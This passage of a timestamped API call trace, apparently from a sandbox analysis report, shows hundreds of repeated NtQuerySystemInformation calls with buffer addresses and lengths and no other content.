SystemInformation=0xc7520fd120, Length=0x20, ResultLength=0x0) [0227.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x20, ResultLength=0x0) [0227.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd310, Length=0x38, ResultLength=0x0) [0227.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1a0, Length=0x20, ResultLength=0x0) [0227.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd130, Length=0x20, ResultLength=0x0) [0227.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd130, Length=0x20, ResultLength=0x0) [0227.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd438, Length=0x58, ResultLength=0x0) [0227.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd300, Length=0x58, ResultLength=0x0) [0227.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd220, Length=0x38, ResultLength=0x0) [0227.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x28, ResultLength=0x0) [0227.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x28, ResultLength=0x0) [0227.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x28, ResultLength=0x0) [0227.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x28, ResultLength=0x0) [0227.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0c0, Length=0x28, ResultLength=0x0) [0227.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd220, Length=0x38, ResultLength=0x0) [0227.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd140, Length=0x28, ResultLength=0x0) [0227.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd140, Length=0x28, ResultLength=0x0) [0227.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd220, Length=0x38, ResultLength=0x0) [0227.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0a0, Length=0x20, ResultLength=0x0) [0227.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd020, Length=0x20, ResultLength=0x0) [0227.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd020, Length=0x20, ResultLength=0x0) [0227.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd020, Length=0x20, ResultLength=0x0) [0227.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd220, Length=0x38, ResultLength=0x0) [0227.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0a0, Length=0x20, ResultLength=0x0) [0227.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd030, Length=0x20, ResultLength=0x0) [0227.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd030, Length=0x20, ResultLength=0x0) [0227.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd300, Length=0x58, ResultLength=0x0) [0227.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd220, Length=0x38, ResultLength=0x0) [0227.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x28, ResultLength=0x0) [0227.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x28, ResultLength=0x0) [0227.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x28, ResultLength=0x0) [0227.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x28, ResultLength=0x0) [0227.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0c0, Length=0x28, ResultLength=0x0) [0227.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd220, Length=0x38, ResultLength=0x0) [0227.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd140, Length=0x28, ResultLength=0x0) [0227.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd140, Length=0x28, ResultLength=0x0) [0227.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfe0, Length=0x20, ResultLength=0x0) [0227.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf60, Length=0x20, ResultLength=0x0) [0227.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf60, Length=0x20, ResultLength=0x0) [0227.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf60, Length=0x20, ResultLength=0x0) [0227.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd220, Length=0x38, ResultLength=0x0) [0227.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd220, Length=0x38, ResultLength=0x0) [0227.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0a0, Length=0x20, ResultLength=0x0) [0227.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd030, Length=0x20, ResultLength=0x0) [0227.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd030, Length=0x20, ResultLength=0x0) [0227.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd300, Length=0x58, ResultLength=0x0) [0227.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd220, Length=0x38, ResultLength=0x0) [0227.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x28, ResultLength=0x0) [0227.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x28, ResultLength=0x0) [0227.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x28, ResultLength=0x0) [0227.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x28, ResultLength=0x0) [0227.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0c0, Length=0x28, ResultLength=0x0) [0227.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd220, Length=0x38, ResultLength=0x0) [0227.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd140, Length=0x28, ResultLength=0x0) [0227.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd140, Length=0x28, ResultLength=0x0) [0227.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd220, Length=0x38, ResultLength=0x0) [0227.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0a0, Length=0x20, ResultLength=0x0) [0227.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd020, Length=0x20, ResultLength=0x0) [0227.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd020, Length=0x20, ResultLength=0x0) [0227.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd020, Length=0x20, ResultLength=0x0) [0227.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd220, Length=0x38, ResultLength=0x0) [0227.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0a0, Length=0x20, ResultLength=0x0) [0227.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd030, Length=0x20, ResultLength=0x0) [0227.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd030, Length=0x20, ResultLength=0x0) [0227.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd300, Length=0x58, ResultLength=0x0) [0227.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1e0, Length=0x38, ResultLength=0x0) [0227.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd020, Length=0x28, ResultLength=0x0) [0227.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd020, Length=0x28, ResultLength=0x0) [0227.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd020, Length=0x28, ResultLength=0x0) [0227.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd020, Length=0x28, ResultLength=0x0) [0227.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd090, Length=0x28, ResultLength=0x0) [0227.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1e0, Length=0x38, ResultLength=0x0) [0227.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1e0, Length=0x38, ResultLength=0x0) [0227.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd110, Length=0x28, ResultLength=0x0) [0227.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd110, Length=0x28, ResultLength=0x0) [0227.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1e0, Length=0x38, ResultLength=0x0) [0227.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1e0, Length=0x38, ResultLength=0x0) [0227.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf80, Length=0x20, ResultLength=0x0) [0227.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf00, Length=0x20, ResultLength=0x0) [0227.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf00, Length=0x20, ResultLength=0x0) [0227.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf00, Length=0x20, ResultLength=0x0) [0227.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x20, ResultLength=0x0) [0227.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1e0, Length=0x38, ResultLength=0x0) [0227.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd070, Length=0x20, ResultLength=0x0) [0227.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcff0, Length=0x20, ResultLength=0x0) [0227.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcff0, Length=0x20, ResultLength=0x0) [0227.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcff0, Length=0x20, ResultLength=0x0) [0227.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.870] NtQuerySystemInformation (SystemInformationClass=0xb9, 